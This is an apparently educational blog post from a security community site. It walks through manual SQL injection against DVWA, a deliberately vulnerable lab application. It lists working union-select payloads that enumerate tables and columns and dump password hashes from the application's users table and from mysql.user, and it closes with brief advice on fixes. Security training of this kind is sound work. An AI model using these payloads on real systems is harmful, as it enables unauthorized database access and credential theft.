Thursday, March 29, 2012

SQL Injection Cheat Sheet for Damn Web Vulnerable Application

Damn Web Vulnerable Application or DVWA is one of my favorite web applications for website penetration testing and web attacking. It is easier for the learner to attack the web application because there is a View Source and View Help command button on . It gives a hint on the pentester some tips about the web application just like the actual SQL Query command.

In this paper, I will give some tips on how SQL Injection is done in order to get the usernames and passwords in the database that DVWA is using. We will attack the web application using manual sql queries and without the use of automated tools like sqlmap, sqlninja, mole, etc. because the best way to learn web penetration testing is to do it manually but let me not discourage you in not using tools too because tools can be of great help.

So now let's start, this is the vulnerable web page for SQL Injection:


Now let's try to put a value on the User ID Field and see what happens.

User ID: 1


Right, the results is:

ID: 1
First name: admin
Surname: admin

It pulled out the first_name and the surname of the User ID number 1. Thus if we put another value like 2 it should give another result. The actual SQL query:

SELECT first_name, last_name FROM users WHERE user_id ='1';

That's why it pulled the columns first_name and last_name from the table user whose user_id is 1.

Now let's try to put a single quote / ' after user_id "1" to check how the web application reacts and to check how it handles quotes.

Yey, it is exploitable because after single quote is also detected by the web application as an SQL query.

Now time to find the number of columns in the database by using the the ORDER BY syntax and increment the number by 1 until the application gives an error. We use a comment character / # at the end or you may use the comment sequence / -- - to close the query after the single quote. :)

1' order by 1 #
1' order by 2 #
1' order by 3 # > error

From what you can see from the image above, it returns an error after the statement SELECT first_name, last_name FROM users WHERE user_id ='1' order by 3 # because column 3 doesn't exist thus there are only two columns that we can use. 

 Now let's use the Union Select Statement:

1' union select 1,2 #


Now from the image above, you can see that in the First Name and Surname output, you can see two numbers; 1 and 2. Yeah the page is a bit messed up and in some websites only numbers will start appearing on the page.

These numbers are the column numbers we can get information from. We will replace them with statements later on. In fact you can replace the values of the two numbers that are identical to the numbers you inputted on the union select. Take for example finding the mysql version:

1' union select @@version,2 #

or

1' union select version(),2 #


Hello version 5.1.41!

Now let's find the tables in the database:

1' union select group_concat(table_name),2 from information_schema.tables where table_schema=database() #


Boooom! The users table should contain good information :))

Now let's try to check the all the columns in the database:

1' union select group_concat(column_name),2 from information_schema.columns where table_schema=database() #


Did I just see column_names user and password? Yeah, we could then use that column names.

Now it's time to pawn the users table:

1' union select user,password from users #


Thus, the next thing that an attacker should do is to crack the hashed passwords of users admin, gordonb, 1337, pablo and smith.

Find the current database user and pawn him

Now let's find the current database user of this web application:
1' union select user(),2 #
or
1' union select system_user(),2 #


Hey it's running root, if that's the case then I can list hashed passwords for mysql.user:
1' union select user,password from mysql.user #


Very risky isn't it? That is why you should fix your codes like using mysql_real_escape_string, clean URLs, web application firewall, parameterized queries and array_map.

Check out my previous article too which is also a cheat sheet for DVWA:

 

About the Contributor:
Shipcode is a prolific blogger of ROOTCON and at the same time an InfoSec enthusiast from Cebu. He was inspired to join ROOTCON as part of the core team to share his knowledge in information security.  He encourages other like minded individuals to come forward and share their knowledge through blogging right here at ROOTCON Blog section.

ROOTCON is managed by like minded InfoSec professionals across the Philippines.  All rights reserved. Designated trademarks, brands and articles are the property of their respective owners.